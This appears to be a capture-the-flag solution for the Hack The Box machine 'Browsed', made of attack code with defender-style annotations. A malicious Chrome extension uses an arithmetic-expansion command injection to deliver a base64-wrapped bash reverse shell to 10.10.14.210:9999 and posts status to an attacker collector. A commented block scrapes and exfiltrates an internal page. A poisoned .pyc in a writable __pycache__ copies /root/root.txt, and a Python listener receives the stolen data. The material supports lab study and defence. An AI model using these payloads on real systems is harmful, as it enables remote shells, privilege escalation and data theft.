HTB: Browsed
// https://dev.to/greymd/eq-can-be-critically-vulnerable-338m
// https://ya.maya.st/d/201909a.html
// https://www.nccgroup.com/research-blog/shell-arithmetic-expansion-and-evaluation-abuse/
// https://github.com/koalaman/shellcheck/issues/3088
// Extension service-worker hook: the callback runs when the extension is installed.
// Defender's reading: the browser that loads this extension is used as a relay to a
// service that only listens on loopback, so "bound to 127.0.0.1" is not an access
// control by itself. Anything a local browser (or its extensions) can request is reachable.
chrome.runtime.onInstalled.addListener(async () => {
  // Collector that receives the status POSTs sent to /loot below.
  const lhost = "10.10.14.210";
  const serverPort = "8081";
  // Loopback-only web application (Flask, per the variable name) on the browser's host.
  const flaskAddr = "http://127.0.0.1:5000";
  // Base64-wrapped command that is decoded and piped to bash.
  const revShell =
    "echo${IFS}L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjEwLzk5OTkgMD4mMSI=|base64${IFS}-d|bash";
  // `name[$(...)]` form: the references linked above this listener describe shells
  // running a command substitution placed in an array subscript when the value is
  // evaluated arithmetically (e.g. by `-eq`).
  // NOTE(review): the script behind /routines/ is not shown here; presumably it hands
  // this path segment to such a comparison. The server-side fix is to reject anything
  // that is not a plain integer before the value reaches the shell.
  const payload = `xxx[$(${revShell})]`;
  // Detection hint: a route that expects a numeric id receiving a URL-decoded path
  // segment containing `$(`, `[` or `|`.
  const targetUrl = `${flaskAddr}/routines/${encodeURIComponent(payload)}`;
  try {
    // "no-cors" yields an opaque response; the request itself is still sent, which
    // is all that is needed here because the response body is never read.
    await fetch(targetUrl, { mode: "no-cors" });
    // Report success to the collector as base64 text.
    await fetch(`http://${lhost}:${serverPort}/loot`, {
      method: "POST",
      mode: "no-cors",
      body: btoa("Payload Sent to Flask: " + targetUrl),
      keepalive: true,
    });
  } catch (e) {
    // Report the fetch error to the collector instead.
    await fetch(`http://${lhost}:${serverPort}/loot`, {
      method: "POST",
      mode: "no-cors",
      body: btoa("Fetch Failed: " + e.toString()),
      keepalive: true,
    });
  }
});
// const serverAddr = "10.10.14.210";
// const serverPort = "8081";
// const targetHost = "http://browsedinternals.htb";
// async function pushData(payload) {
// const b64 = btoa(unescape(encodeURIComponent(payload)));
// await fetch(`http://${serverAddr}:${serverPort}/loot`, {
// method: "POST",
// mode: "no-cors",
// body: b64,
// });
// }
// chrome.tabs.create({ url: targetHost, active: false }, (tab) => {
// chrome.tabs.onUpdated.addListener(function listener() {
// chrome.tabs.onUpdated.removeListener(listener);
// chrome.scripting.executeScript(
// {
// target: { tabId: tab.id },
// func: () => document.documentElement.outerHTML,
// },
// async (results) => {
// await pushData(results[0].result);
// chrome.tabs.remove(tab.id);
// },
// );
// });
// });
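# Insecure permissions on /opt/extensiontool/__pycache__ (the steps below rely on being able to write a .pyc there).
# This write-up by @xct was really helpful: https://vuln.dev/vulnlab-odori/
# An unchecked-hash .pyc is loaded without being validated against its source file, which is why the
# compile step below uses that invalidation mode. Hardening: keep __pycache__ owned by root and not
# writable by other users; `python3 --check-hash-based-pycs always` makes the interpreter validate
# hash-based .pyc files against the source.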
#
# python3 -m compileall extension_utils.py --invalidation-mode unchecked-hash
# sudo /opt/extensiontool/extension_tool.py
# Traceback (most recent call last):
# File "/opt/extensiontool/extension_tool.py", line 5, in <module>
# from extension_utils import validate_manifest, clean_temp_files
# ImportError: cannot import name 'validate_manifest' from 'extension_utils' (/opt/extensiontool/extension_utils.py)
import os
# NOTE(review): presumably this is the file compiled as extension_utils.py in the
# steps above; confirm against the author's layout.
# The statement is module-level, so it runs during import. That is why the command
# has already executed when the ImportError in the traceback above is raised: the
# error is about the names missing from the module, not about the import failing.
# Effect: copies /root/root.txt to /tmp/root.txt and sets mode 777 on the copy.
# Detection hint: a .pyc in a privileged tool's __pycache__ whose owner or timestamp
# does not match the source file next to it.
os.system("cp /root/root.txt /tmp/root.txt; chmod 777 /tmp/root.txt")
{
"manifest_version": 3,
"name": "abc",
"version": "1.0",
"description": "abc",
"permissions": ["tabs", "scripting", "<all_urls>"],
"host_permissions": ["<all_urls>", "*://*/*"],
"background": {
"service_worker": "background.js"
}
}
from http.server import HTTPServer, BaseHTTPRequestHandler
import base64
from pwn import log
from urllib.parse import unquote
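class SyncHandler(BaseHTTPRequestHandler):
    """HTTP handler that prints base64-encoded POST bodies to the console.

    Each POST body is expected to be base64 text. It is decoded, URL-unquoted
    and printed together with the sender's address. Per-request access
    logging is disabled (see ``log_message``).
    """

    def do_POST(self):
        """Decode and print one POST body, then reply 204.

        Replies 411 when Content-Length is absent and 400 when it is not a
        non-negative integer, instead of raising inside the handler.
        """
        # The header is supplied by the peer: it can be missing, non-numeric
        # or negative, and none of those should reach rfile.read().
        raw_length = self.headers.get('Content-Length')
        if raw_length is None:
            self._reply(411)
            return
        try:
            content_length = int(raw_length)
        except ValueError:
            content_length = -1
        if content_length < 0:
            # A negative size would make rfile.read() block until the peer
            # closes the connection.
            self._reply(400)
            return

        # NOTE(review): the body size is not capped; on a listener reachable
        # from other hosts, a large Content-Length is buffered in full.
        body = self.rfile.read(content_length)
        try:
            # Decoding sits inside the try so a non-UTF-8 body is reported
            # as a decode error rather than escaping the handler.
            post_data = body.decode('utf-8')
            raw_decoded = base64.b64decode(post_data).decode('utf-8')
            final_data = unquote(raw_decoded)
            log.success(f"Incoming from {self.client_address[0]}:")
            print(final_data)
            print()
        except Exception as e:
            # Best effort: a malformed body is logged, and the sender still
            # gets the normal 204 below.
            log.warning(f"Decode error: {e}")
        self._reply(204)

    def _reply(self, code):
        """Send a header-only response with the given status code."""
        self.send_response(code)
        self.end_headers()

    def log_message(self, format, *args):
        """Suppress the default per-request log line written to stderr."""
        return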
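if __name__ == '__main__':
    # Listens on every interface, port 8081: any host that can route here can
    # post to the handler. Bind a specific address where that is not intended.
    server_address = ('0.0.0.0', 8081)
    httpd = HTTPServer(server_address, SyncHandler)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        log.warning("Exiting...")
    finally:
        # Release the listening socket on every exit path, not only Ctrl-C.
        httpd.server_close()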